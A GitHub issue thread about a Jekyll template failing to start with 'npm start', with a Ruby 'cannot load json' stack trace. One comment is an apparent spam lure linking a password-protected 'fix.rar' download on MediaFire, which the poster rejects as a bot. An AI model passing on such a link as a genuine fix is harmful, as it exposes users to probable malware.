### ISSUE TITLE
can't start with npm

### ISSUE THREAD

**Issue by misterxcrypt** [CloudCannon/vonge-jekyll-bookshop-template#34]
> start
> run-p bookshop jekyll

> bookshop
> bookshop-browser

> jekyll
> BUNDLE_GEMFILE=site/Gemfile bundle exec jekyll serve --source site --port 6060 --trace --unpublished

bundler: failed to load command: jekyll (/home/mrrobot/.local/share/gem/ruby/3.0.0/bin/jekyll)
/home/mrrobot/.local/share/gem/ruby/3.0.0/gems/jekyll-4.3.3/lib/jekyll.rb:29:in `require': cannot load such file -- json (LoadError)
        from /home/mrrobot/.local/share/gem/ruby/3.0.0/gems/jekyll-4.3.3/lib/jekyll.rb:29:in `<top (required)>'
        from /home/mrrobot/.local/share/gem/ruby/3.0.0/gems/jekyll-4.3.3/exe/jekyll:8:in `require'
        from /home/mrrobot/.local/share/gem/ruby/3.0.0/gems/jekyll-4.3.3/exe/jekyll:8:in `<top (required)>'
        from /home/mrrobot/.local/share/gem/ruby/3.0.0/bin/jekyll:25:in `load'
        from /home/mrrobot/.local/share/gem/ruby/3.0.0/bin/jekyll:25:in `<top (required)>'
        from /usr/lib/ruby/gems/3.0.0/gems/bundler-2.3.26/lib/bundler/cli/exec.rb:58:in `load'
        from /usr/lib/ruby/gems/3.0.0/gems/bundler-2.3.26/lib/bundler/cli/exec.rb:58:in `kernel_load'
        from /usr/lib/ruby/gems/3.0.0/gems/bundler-2.3.26/lib/bundler/cli/exec.rb:23:in `run'
        from /usr/lib/ruby/gems/3.0.0/gems/bundler-2.3.26/lib/bundler/cli.rb:486:in `exec'
        from /usr/lib/ruby/gems/3.0.0/gems/bundler-2.3.26/lib/bundler/vendor/thor/lib/thor/command.rb:27:in `run'
        from /usr/lib/ruby/gems/3.0.0/gems/bundler-2.3.26/lib/bundler/vendor/thor/lib/thor/invocation.rb:127:in `invoke_command'
        from /usr/lib/ruby/gems/3.0.0/gems/bundler-2.3.26/lib/bundler/vendor/thor/lib/thor.rb:392:in `dispatch'
        from /usr/lib/ruby/gems/3.0.0/gems/bundler-2.3.26/lib/bundler/cli.rb:31:in `dispatch'
        from /usr/lib/ruby/gems/3.0.0/gems/bundler-2.3.26/lib/bundler/vendor/thor/lib/thor/base.rb:485:in `start'
        from /usr/lib/ruby/gems/3.0.0/gems/bundler-2.3.26/lib/bundler/cli.rb:25:in `start'
        from /usr/lib/ruby/gems/3.0.0/gems/bundler-2.3.26/exe/bundle:48:in `block in <top (required)>'
        from /usr/lib/ruby/gems/3.0.0/gems/bundler-2.3.26/lib/bundler/friendly_errors.rb:120:in `with_friendly_errors'
        from /usr/lib/ruby/gems/3.0.0/gems/bundler-2.3.26/exe/bundle:36:in `<top (required)>'
        from /usr/bin/bundle:25:in `load'
        from /usr/bin/bundle:25:in `<main>'
ERROR: "jekyll" exited with 1.

i can't load the site with 'npm start'

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by misterxcrypt** [comment]
bro. we don't fall for this kinda bot

**Comment by misterxcrypt** [comment]
No problem i resolved it
